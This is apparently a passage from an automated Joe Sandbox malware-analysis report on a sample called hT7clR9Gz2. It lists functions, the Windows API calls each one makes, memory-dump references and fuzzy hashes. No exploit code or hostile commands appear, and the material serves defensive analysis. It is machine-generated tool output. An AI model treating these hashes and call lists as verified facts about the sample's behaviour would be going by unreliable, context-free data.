                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 8396d2c29c47829da8da04e1b30caf92fb6ec589da2739a29e197eac40e0de58
                                                                      • Instruction ID: 778a69e38f0d002219f76d4b66d1fd9f959b2dadd1fb422dee9fdae8b4c30d75
                                                                      • Opcode Fuzzy Hash: 8396d2c29c47829da8da04e1b30caf92fb6ec589da2739a29e197eac40e0de58
                                                                      • Instruction Fuzzy Hash: 4F41DEB1504341EFDB64DF14E588E6AB7E6FFD4320F158A2EEA8183260E778EC04CA51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007E97E5: GetLastError.KERNEL32(?,00801098,007E4674,00801098,?,?,007E40EF,?,?,00801098), ref: 007E97E9
                                                                        • Part of subcall function 007E97E5: _free.LIBCMT ref: 007E981C
                                                                        • Part of subcall function 007E97E5: SetLastError.KERNEL32(00000000,?,00801098), ref: 007E985D
                                                                        • Part of subcall function 007E97E5: _abort.LIBCMT ref: 007E9863
                                                                        • Part of subcall function 007EBB4E: _abort.LIBCMT ref: 007EBB80
                                                                        • Part of subcall function 007EBB4E: _free.LIBCMT ref: 007EBBB4
                                                                        • Part of subcall function 007EB7BB: GetOEMCP.KERNEL32(00000000,?,?,007EBA44,?), ref: 007EB7E6
                                                                      • _free.LIBCMT ref: 007EBA9F
                                                                      • _free.LIBCMT ref: 007EBAD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast_abort
                                                                      • String ID:
                                                                      • API String ID: 2991157371-0
                                                                      • Opcode ID: 5eebab8d2c4cb87fa29ba12c230349ec91c5bcc146c04b4d46c233813a5b5594
                                                                      • Instruction ID: efc0d68a635b1e9bcabaffd55bd6b15d474e0e7558c1d1ea1d063ed5169025ea
                                                                      • Opcode Fuzzy Hash: 5eebab8d2c4cb87fa29ba12c230349ec91c5bcc146c04b4d46c233813a5b5594
                                                                      • Instruction Fuzzy Hash: 34313E31901189EFDF10DF6AE845BAE7FF1EF48320F2580A9E5049B2A1EB395D40DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C1E55
                                                                        • Part of subcall function 007C3BBA: __EH_prolog.LIBCMT ref: 007C3BBF
                                                                      • _wcslen.LIBCMT ref: 007C1EFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2838827086-0
                                                                      • Opcode ID: 88865e6dea47abdcd38230278c8055ee085b92f2afcf90d3359d466ec7261f09
                                                                      • Instruction ID: c74bd2a49bad0d27d267909f490564057988995f8b85753e31f1cd906bf0a9d8
                                                                      • Opcode Fuzzy Hash: 88865e6dea47abdcd38230278c8055ee085b92f2afcf90d3359d466ec7261f09
                                                                      • Instruction Fuzzy Hash: 8E314C71905209EFCF15EF98C949EEEBBF5AF49300F5000AEE445A7252C73A5E00CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007C73BC,?,?,?,00000000), ref: 007C9DBC
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 007C9E70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$BuffersFlushTime
                                                                      • String ID:
                                                                      • API String ID: 1392018926-0
                                                                      • Opcode ID: 3638f7e9bf9c1681c5d492ae0213c5cc7a9d98fdb7086d229df49865cca32f34
                                                                      • Instruction ID: 177250ab082c492dd1c9f2878b7228f301959c9770197403ce1d469a29feeff5
                                                                      • Opcode Fuzzy Hash: 3638f7e9bf9c1681c5d492ae0213c5cc7a9d98fdb7086d229df49865cca32f34
                                                                      • Instruction Fuzzy Hash: 4621CE32248285EBC754DF24C899FAABBE4AF55304F08491DF5C687541D32DE90CDBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007C9F27,?,?,007C771A), ref: 007C96E6
                                                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007C9F27,?,?,007C771A), ref: 007C9716
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 0fb7f0d23c9a0a510d64d6bce0e1d5ddcce6ca716484ac4b1529497d4235fd1f
                                                                      • Instruction ID: 6549305df30484fa87b7c8b9ab71584c736315f19ce7937a1fbe1f182c828bad
                                                                      • Opcode Fuzzy Hash: 0fb7f0d23c9a0a510d64d6bce0e1d5ddcce6ca716484ac4b1529497d4235fd1f
                                                                      • Instruction Fuzzy Hash: 8021BDB1100344AEE3B08A65CC8DFB7B7DCEB49324F004A1DFA99D62D1C778A8848671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 007C9EC7
                                                                      • GetLastError.KERNEL32 ref: 007C9ED4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 0eb0c7a32bb24b9864a8cbccb77239d21ea92a65503d4a6109c2ae0d528102d3
                                                                      • Instruction ID: 0148268441dc8485ed843202b1180acd86dc9705997781f04195f0f3b343b796
                                                                      • Opcode Fuzzy Hash: 0eb0c7a32bb24b9864a8cbccb77239d21ea92a65503d4a6109c2ae0d528102d3
                                                                      • Instruction Fuzzy Hash: C411E532600700ABD764C628CC88FA6B7E9AB55370F504A2EE653D26D0D778ED49C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E8E75
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00801098,007C17CE,?,?,00000007,?,?,?,007C13D6,?,00000000), ref: 007E8EB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocAllocate_free
                                                                      • String ID:
                                                                      • API String ID: 2447670028-0
                                                                      • Opcode ID: 382862ebc557092a079d77992cb7cb6c9e4e349499241fc26b4634ef1cd1de2a
                                                                      • Instruction ID: 7bb0c38b6c77d43f373bbdb7035d2168196d2df01f9d15974f8b8302409e01e9
                                                                      • Opcode Fuzzy Hash: 382862ebc557092a079d77992cb7cb6c9e4e349499241fc26b4634ef1cd1de2a
                                                                      • Instruction Fuzzy Hash: B7F0FC322031C5AADBA12A2B9C09F6F37589F8D770F284165F81C5A191DF7CCD0091A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 007D10AB
                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 007D10B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$AffinityCurrentMask
                                                                      • String ID:
                                                                      • API String ID: 1231390398-0
                                                                      • Opcode ID: ebb4ef5f9ae1479eae1b4faa8af6d1f35e2386b40831d57f9d6303bcac7a74e4
                                                                      • Instruction ID: ee99985f98afd7dd4c0342b4cb5976d35d4090bcf581f3e8089ea620eb8126e0
                                                                      • Opcode Fuzzy Hash: ebb4ef5f9ae1479eae1b4faa8af6d1f35e2386b40831d57f9d6303bcac7a74e4
                                                                      • Instruction Fuzzy Hash: 81E0D872B00145B7CF0997B49C059FB77FEEB442443148177E403D7201F938DE418660
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E8268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007EBF30: GetEnvironmentStringsW.KERNEL32 ref: 007EBF39
                                                                        • Part of subcall function 007EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007EBF5C
                                                                        • Part of subcall function 007EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007EBF82
                                                                        • Part of subcall function 007EBF30: _free.LIBCMT ref: 007EBF95
                                                                        • Part of subcall function 007EBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007EBFA4
                                                                      • _free.LIBCMT ref: 007E82AE
                                                                      • _free.LIBCMT ref: 007E82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                      • String ID:
                                                                      • API String ID: 400815659-0
                                                                      • Opcode ID: 2ed74ddb08090e9e970609cc5c816599e82376d18f7df129a2b147def1bce583
                                                                      • Instruction ID: 2829d9e12b4610518202fd707be4f5816d0c287bd5b06123b1c9196fc7e39dce
                                                                      • Opcode Fuzzy Hash: 2ed74ddb08090e9e970609cc5c816599e82376d18f7df129a2b147def1bce583
                                                                      • Instruction Fuzzy Hash: 77E06523A079D2D5D6E1727B7C4A66B0608AB8D338B550216F718DA1C3DE5C884645A7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2673547680-0
                                                                      • Opcode ID: 9c062468d4a71c1674d550c9c2d306b75f568b39a3390070a3526928a9703c48
                                                                      • Instruction ID: d73bab24fdadc399c6ecdeb3d23fcad99d67ac7b5447f47bf8210b0e5ab221dd
                                                                      • Opcode Fuzzy Hash: 9c062468d4a71c1674d550c9c2d306b75f568b39a3390070a3526928a9703c48
                                                                      • Instruction Fuzzy Hash: 72F03035240109BBDF015F60EC45FEA376DAF04385F44805AB949D5160DB75DA94DA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(000000FF,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641,000000FF), ref: 007CA1F1
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641), ref: 007CA21F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2643169976-0
                                                                      • Opcode ID: 7958073bc3da0e0b6ef7bec8821df077b16efc698573515f62f3ef16af067193
                                                                      • Instruction ID: 6449330a0af034489a390b02aa81523b755008c6853bc61be6cfb75646fee86f
                                                                      • Opcode Fuzzy Hash: 7958073bc3da0e0b6ef7bec8821df077b16efc698573515f62f3ef16af067193
                                                                      • Instruction Fuzzy Hash: 8CE0927114021DBBDB015F60DC45FEA376CBF08386F48402AB944D6050EB69DE84DA64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,007F2641,000000FF), ref: 007DACB0
                                                                      • OleUninitialize.OLE32(?,?,?,?,007F2641,000000FF), ref: 007DACB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GdiplusShutdownUninitialize
                                                                      • String ID:
                                                                      • API String ID: 3856339756-0
                                                                      • Opcode ID: a81204e980ef4bf799c56cd27a4fb763bacc9b7eda750cc6e34eddca7c602563
                                                                      • Instruction ID: b6fbafa56dc7338677bd270870335501cc0164171bd5b33bc9fc13494a6eb0f6
                                                                      • Opcode Fuzzy Hash: a81204e980ef4bf799c56cd27a4fb763bacc9b7eda750cc6e34eddca7c602563
                                                                      • Instruction Fuzzy Hash: A5E06572504650EFC7119B58DC06B55FBA8FB48B20F004266F416D3760CB786841CA94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,007CA23A,?,007C755C,?,?,?,?), ref: 007CA254
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007CA23A,?,007C755C,?,?,?,?), ref: 007CA280
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2673547680-0
                                                                      • Opcode ID: cfd783c3b7e215e440122805e62bc3fc65dbbbafc70315047f92ec6a9de2ee56
                                                                      • Instruction ID: aba5c03403970499d5413226de8340d1215871170600c46dc0b4decf5a20d75e
                                                                      • Opcode Fuzzy Hash: cfd783c3b7e215e440122805e62bc3fc65dbbbafc70315047f92ec6a9de2ee56
                                                                      • Instruction Fuzzy Hash: E8E09272500128ABCB51AB64DC09FE97768EB083E6F044266FD44E3294DB78DE44CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007DDEEC
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(00000065,?), ref: 007DDF03
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                      • String ID:
                                                                      • API String ID: 2718869927-0
                                                                      • Opcode ID: 9e54821803f2b0ecafac0e80efd3d2f8400d3ef62ee7a21849aeec196faeb1ac
                                                                      • Instruction ID: d0f5f4f1f707f60544936b56c2a749c3f9435727559ff27992c11f6eec4bfda3
                                                                      • Opcode Fuzzy Hash: 9e54821803f2b0ecafac0e80efd3d2f8400d3ef62ee7a21849aeec196faeb1ac
                                                                      • Instruction Fuzzy Hash: E7E09B71410348E6DF02A760DC0AF9E376C6B05785F040455B245DA1A3D97CD6508675
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

